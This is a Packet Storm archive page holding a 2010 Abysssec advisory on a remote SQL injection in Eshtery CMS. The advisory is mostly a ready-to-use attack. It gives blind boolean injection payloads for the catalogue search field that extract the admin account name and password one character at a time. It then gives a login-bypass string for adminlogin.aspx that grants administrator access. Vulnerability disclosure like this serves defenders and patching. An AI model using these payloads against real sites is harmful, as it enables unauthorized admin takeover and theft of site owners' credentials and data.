exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Month Of Abysssec Undisclosed Bugs - Eshtery CMS

Month Of Abysssec Undisclosed Bugs - Eshtery CMS
Posted Sep 13, 2010
Authored by Abysssec | Site abysssec.com

Month Of Abysssec Undisclosed Bugs - Eshtery CMS suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 29b9fd1a5622edcaec5b9e97ed24a3c4909f3b35509a4a3caa5ff1ab55fd0cf1

Month Of Abysssec Undisclosed Bugs - Eshtery CMS

Change Mirror Download
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/

http://www.exploit-db.com/moaub12-eshtery-cms-sql-injection-vulnerability/
'''


Abysssec Inc Public Advisory

Title : eshtery CMS Sql Injection Vulnerability
Affected Version : eshtery copyrights 2003-2004
Discovery : www.abysssec.com
Vendor : http://eshtery.she7ata.com/projects/eshtery/

Demo : http://eshtery.she7ata.com/projects/eshtery/
Download Links : http://sourceforge.net/projects/eshtery/


Description :
===========================================================================================
1) SQL Injection

for successful injection in this cms you have to pass two steps.

Step 1:
----------------------------------------------------------------------------------------
Go to this path:
http://Example.com/catlgsearch.aspx

and enter this value in Criteria field:
%') and 1=1 AND (Item.iname LIKE '%

and click on "go" button. You will see that the data will be loaded.

Now enter this value:
%') and 1=2 AND (Item.iname LIKE '%

With this value no data will be loaded.


So if we enter below value, with the following technique we can define the first character
of AccName field of Admins table :
%') and 1=IIF((select mid(last(AccName),1,1) from (select top 1 AccName from admins))='a',1,2) AND (Item.iname LIKE '%

If the first character is 'a', the data will be loaded. If not, you will see nothing.

Second character:
%') and 1=IIF((select mid(last(AccName),2,1) from (select top 1 AccName from admins))='d',1,2) AND (Item.iname LIKE '%

and respectivly you can acqure another characters.

As a result, the first value of AccName field from Admins table acqured.

With this method you can obtain the Password value of Admin from Admins table
and going to other steps is not necessary.


Step 2:
----------------------------------------------------------------------------------------
The value of AccName obtained in the first step(for example: admin).
You can go to adminlogin.aspx page:
http://Example.com/adminlogin.aspx

and enter this value to login:
username : admin' or '1'='1
password : foo

Now you are admin of site.




===========================================================================================


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close